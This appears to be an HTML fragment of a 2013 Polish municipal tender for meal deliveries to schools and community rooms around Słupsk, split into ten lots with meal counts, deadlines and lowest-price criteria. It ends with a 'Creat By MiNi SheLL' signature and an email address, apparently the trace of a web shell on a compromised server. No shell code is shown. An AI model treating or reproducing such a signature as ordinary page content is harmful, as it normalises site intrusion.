<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany treści umowy:
1) w zakresach opisanych w pkt 3.0 (przedmiot zamówienia zamówienia - menu),
2) zmian obligatoryjnych wynikających ze zmian przepisów prawa,
3) zmian w zakresie terminów i ilości posiłków do poszczególnych lokalizacji, wynikających z aktualnego zapotrzebowania
4) zmian niezależnych od stron wynikających z siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.gops.slupsk.ug.gov.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego w Gminnym Ośrodku Pomocy Społecznej w Słupsku, ul. Sportowa 9A, 76-200 Słupsk pok 4 i w Urzędzie Gminy Słupsk, ul. Sportowa 34, 76-200 Słupsk pok 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2013 godzina 10:00, miejsce: W sekretariacie Urzędu Gminy w Słupsku, ul. Sportowa 34, 76-200 Słupsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. W czasie realizacji umowy Zamawiający zastrzega sobie prawo do dokonywania kontroli w zakresie należytego wykonywania warunków umowy.
2. W odstępie trzech miesięcy Zamawiający będzie mógł sporządzać raport o przebiegu realizacji umowy w szczególności z oceną przestrzegania istotnych jej elementów:
1) terminowość dostaw,
2) norm jakościowych posiłków pod względem kalorycznym,
3) norm jakościowych posiłków pod względem temperatury,
4) norm jakościowych posiłków pod względem gramatury,
5) zgodności posiłków z ustalonym i zaakceptowanym, przez upoważnione i wymagane osoby, menu,
6) przestrzegania czystości, przepisów BHP i Państwowej Inspekcji Sanitarnej.
3. W przypadku kiedy co najmniej dwa lub więcej elementów, określonych w pkt 22.4, będzie realizowane z rażącym naruszeniem i zostanie odpowiednio udokumentowane w trzymiesięcznym raporcie, Zamawiający będzie miał prawo do natychmiastowego wypowiedzenia umowy z zachowaniem prawa do naliczenia kary umownej w wysokości 10% łącznej wartości zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - dostawa posiłków do Szkoły Podstawowej we Wrześciu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - dostawa posiłków do Szkoły Podstawowej we Wrześciu - 22 687 posiłków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - dostawa posiłków do Szkoły Podstawowej w Bierkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 - dostawa posiłków do Szkoły Podstawowej w Bierkowie - 21 578 posiłków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - dostawa posiłków do:
- przy świetlicy w Bruskowie Wielkim;
- przy sklepie w Redęcinie;
- przy sklepie w Gaci..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 - dostawa 15 915 posiłków do:
- przy świetlicy w Bruskowie Wielkim;
- przy sklepie w Redęcinie;
- przy sklepie w Gaci..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - dostawa posiłków do Zespołu Szkół w Siemianicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4 - dostawa posiłków do Zespołu Szkół w Siemianicach - 35 378 posiłków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - dostawa posiłków do Zespołu Szkół w Jezierzycach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5 - dostawa posiłków do Zespołu Szkół w Jezierzycach - 46 271 posiłków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - dostawa posiłków do:
- przy sklepie w Kukowie;
- przy świetlicy w Rogawicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 6 - dostawa 11 103 posiłków do:
- przy sklepie w Kukowie;
- przy świetlicy w Rogawicy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - dostawa posiłków do Szkoły Podstawowej we Włynkówku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 7 - dostawa posiłków do Szkoły Podstawowej we Włynkówku - 28 127 posiłków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - dostawa posiłków przy świetlicy w Strzelinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 8 - dostawa posiłków przy świetlicy w Strzelinie - 8 814 posiłków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - dostawa posiłków do Szkoły Podstawowej w Głobinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 9 - dostawa posiłków do Szkoły Podstawowej w Głobinie - 29 153.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - dostawa posiłków do:
- przy świetlicy w Warblewie;
- przy świetlicy w Kusowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 10 - dostawa 10 281 posiłków do:
- przy świetlicy w Warblewie;
- przy świetlicy w Kusowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com